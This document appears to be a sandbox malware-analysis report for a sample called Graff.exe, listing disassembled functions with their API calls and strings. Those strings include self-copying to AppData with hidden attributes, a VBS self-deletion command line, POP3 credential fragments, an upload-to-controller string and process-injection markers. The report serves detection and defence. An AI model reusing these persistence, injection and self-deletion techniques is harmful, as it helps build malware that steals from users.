Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3

Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Local\misruling\Graff.exe,00000001,004068B2,C:\Users\user\AppData\Local\misruling\Graff.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
GetProcAddress.KERNEL32(00000000), ref: 004064FD
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
GetProcAddress.KERNEL32(00000000), ref: 00406511
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
GetProcAddress.KERNEL32(00000000), ref: 00406525
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
GetProcAddress.KERNEL32(00000000), ref: 00406539
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
GetProcAddress.KERNEL32(00000000), ref: 0040654D
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
GetProcAddress.KERNEL32(00000000), ref: 00406561

Strings

NtAllocateVirtualMemory, xrefs: 00406508
C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 004064E1
RtlReleasePebLock, xrefs: 00406544
RtlAcquirePebLock, xrefs: 00406530
NtFreeVirtualMemory, xrefs: 0040651C
RtlInitUnicodeString, xrefs: 004064EE
ntdll.dll, xrefs: 004064E8, 004064F3, 0040650D, 00406521, 00406535, 00406549, 0040655D
LdrEnumerateLoadedModules, xrefs: 00406558

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Users\user\AppData\Local\misruling\Graff.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-2226174004
Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D

Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040BC75
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
CopyFileW.KERNEL32(C:\Users\user\AppData\Local\misruling\Graff.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
_wcslen.LIBCMT ref: 0040BD54
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
CopyFileW.KERNEL32(C:\Users\user\AppData\Local\misruling\Graff.exe,00000000,00000000), ref: 0040BDF2
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
_wcslen.LIBCMT ref: 0040BE34
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
ExitProcess.KERNEL32 ref: 0040BED0

Strings

del, xrefs: 0040BE63
C:\Users\user\AppData\Local\misruling\Graff.exe, xrefs: 0040BCFF, 0040BD04, 0040BD37, 0040BDEC, 0040BDF1, 0040BDF8, 0040BE59
BG, xrefs: 0040BCB6
6, xrefs: 0040BD48
BG, xrefs: 0040BCE1
open, xrefs: 0040BEB2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\AppData\Local\misruling\Graff.exe$del$open$BG$BG
API String ID: 1579085052-997071614
Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE

Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B

_strlen.LIBCMT ref: 10001855
_strlen.LIBCMT ref: 10001869
_strlen.LIBCMT ref: 1000188B
_strlen.LIBCMT ref: 100018AE
_strlen.LIBCMT ref: 100018C8

Strings

t, xrefs: 10001790
Acco, xrefs: 1000177A
Pass, xrefs: 100017C6
POP3, xrefs: 100017D9
word, xrefs: 100017CD
Acco, xrefs: 100017A7
word, xrefs: 100017EA
un, xrefs: 10001787
Pass, xrefs: 100017E3
POP3, xrefs: 1000179D
un, xrefs: 100017B6
t, xrefs: 100017BF

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _strlen$File$CopyCreateDelete
String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
API String ID: 3296212668-3023110444
Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041B1D6
_memcmp.LIBVCRUNTIME ref: 0041B1EE
lstrlenW.KERNEL32(?), ref: 0041B207
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
_wcslen.LIBCMT ref: 0041B2DB
FindVolumeClose.KERNEL32(?), ref: 0041B2FB
GetLastError.KERNEL32 ref: 0041B313
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
lstrcatW.KERNEL32(?,?), ref: 0041B359
lstrcpyW.KERNEL32(?,?), ref: 0041B368
GetLastError.KERNEL32 ref: 0041B370

Strings

?, xrefs: 0041B26D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6

Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001A2D
_strlen.LIBCMT ref: 10001A59
_strlen.LIBCMT ref: 10001A77
_strlen.LIBCMT ref: 10001AC0
_strlen.LIBCMT ref: 10001AD3
_strlen.LIBCMT ref: 10001AE0
_strlen.LIBCMT ref: 10001B24
_strlen.LIBCMT ref: 10001B44
_strlen.LIBCMT ref: 10001B67
_strlen.LIBCMT ref: 10001C14
_strlen.LIBCMT ref: 10001C37

Strings

Gon~, xrefs: 10001A07
~F@7, xrefs: 10001A16
~dra, xrefs: 100019FD
%m$~, xrefs: 10001A1D

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _strlen
String ID: %m$~$Gon~$~F@7$~dra
API String ID: 4218353326-230879103
Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044E2A0
_free.LIBCMT ref: 0044E2C6
_free.LIBCMT ref: 0044E2EF
_free.LIBCMT ref: 0044E327
_free.LIBCMT ref: 0044E358
_free.LIBCMT ref: 0044E399
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044E41A
_free.LIBCMT ref: 0044E433
_wcschr.LIBVCRUNTIME ref: 0044E470
_free.LIBCMT ref: 0044E4DC
_free.LIBCMT ref: 0044E502
_free.LIBCMT ref: 0044E52B
_free.LIBCMT ref: 0044E560
_free.LIBCMT ref: 0044E591
_free.LIBCMT ref: 0044E5D2
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E657
_free.LIBCMT ref: 0044E670

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D

Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
LoadLibraryA.KERNEL32(?), ref: 00413EC8
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
FreeLibrary.KERNEL32(00000000), ref: 00413EEF
LoadLibraryA.KERNEL32(?), ref: 00413F27
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
FreeLibrary.KERNEL32(00000000), ref: 00413F40
GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
FreeLibrary.KERNEL32(00000000), ref: 00413F66

Strings

getaddrinfo, xrefs: 00413E44, 00413EE2, 00413F33
freeaddrinfo, xrefs: 00413E63
\wship6, xrefs: 00413F0F
getnameinfo, xrefs: 00413E53
\ws2_32, xrefs: 00413EB0

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE

Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
RegCloseKey.ADVAPI32(?), ref: 0041BB54

Strings

InstallLocation, xrefs: 0041B911
InstallDate, xrefs: 0041B925
UninstallString, xrefs: 0041B939
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B83C
DisplayVersion, xrefs: 0041B8FD
DisplayName, xrefs: 0041B8D1
Publisher, xrefs: 0041B8E6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A

Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
__aulldiv.LIBCMT ref: 00407FE9
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
CloseHandle.KERNEL32(00000000), ref: 00408200
CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
CloseHandle.KERNEL32(00000000), ref: 00408256

Strings

Uploading file to Controller: , xrefs: 00408077
>G, xrefs: 00407E87
SetFilePointerEx error, xrefs: 00408266
ReadFile error, xrefs: 0040822E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
API String ID: 1884690901-3066803209
Opcode ID: 901821e20c45e65f3c81841d918d84629c8dd5a5d8c7935a1de31ee315c2d8fc
Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
Opcode Fuzzy Hash: 901821e20c45e65f3c81841d918d84629c8dd5a5d8c7935a1de31ee315c2d8fc
Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B

Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 10007D06

Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF

_free.LIBCMT ref: 10007CFB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10007D1D
_free.LIBCMT ref: 10007D32
_free.LIBCMT ref: 10007D3D
_free.LIBCMT ref: 10007D5F
_free.LIBCMT ref: 10007D72
_free.LIBCMT ref: 10007D80
_free.LIBCMT ref: 10007D8B
_free.LIBCMT ref: 10007DC3
_free.LIBCMT ref: 10007DCA
_free.LIBCMT ref: 10007DE7
_free.LIBCMT ref: 10007DFF

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004500B1

Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8

_free.LIBCMT ref: 004500A6

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

_free.LIBCMT ref: 004500C8
_free.LIBCMT ref: 004500DD
_free.LIBCMT ref: 004500E8
_free.LIBCMT ref: 0045010A
_free.LIBCMT ref: 0045011D
_free.LIBCMT ref: 0045012B
_free.LIBCMT ref: 00450136
_free.LIBCMT ref: 0045016E
_free.LIBCMT ref: 00450175
_free.LIBCMT ref: 00450192
_free.LIBCMT ref: 004501AA

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A

Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371

Strings

BG, xrefs: 0040E380
ielowutil.exe, xrefs: 0040E417
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040E3BF
Inj, xrefs: 0040E515
ieinstal.exe, xrefs: 0040E3D6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
API String ID: 726551946-3025026198
Opcode ID: d6271d8332f343668cf1b3c6108f6949d7ea928af4b0193bbb99a0afeba37e49
Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
Opcode Fuzzy Hash: d6271d8332f343668cf1b3c6108f6949d7ea928af4b0193bbb99a0afeba37e49
Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A

Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
ExitProcess.KERNEL32 ref: 0040C832

Strings

CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C767
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C7D5
.vbs, xrefs: 0040C6CD
exepath, xrefs: 0040C69F
Temp, xrefs: 0040C708
@CG, xrefs: 0040C67D
""", 0, xrefs: 0040C74F
open, xrefs: 0040C820

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-390638927
Opcode ID: 5a99a0ba82af5c75c341060aecbf50870bdda68ea9d650c93d3175d56eb0fe59
Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
Opcode Fuzzy Hash: 5a99a0ba82af5c75c341060aecbf50870bdda68ea9d650c93d3175d56eb0fe59
Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99

Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F429
_free.LIBCMT ref: 0044F44D
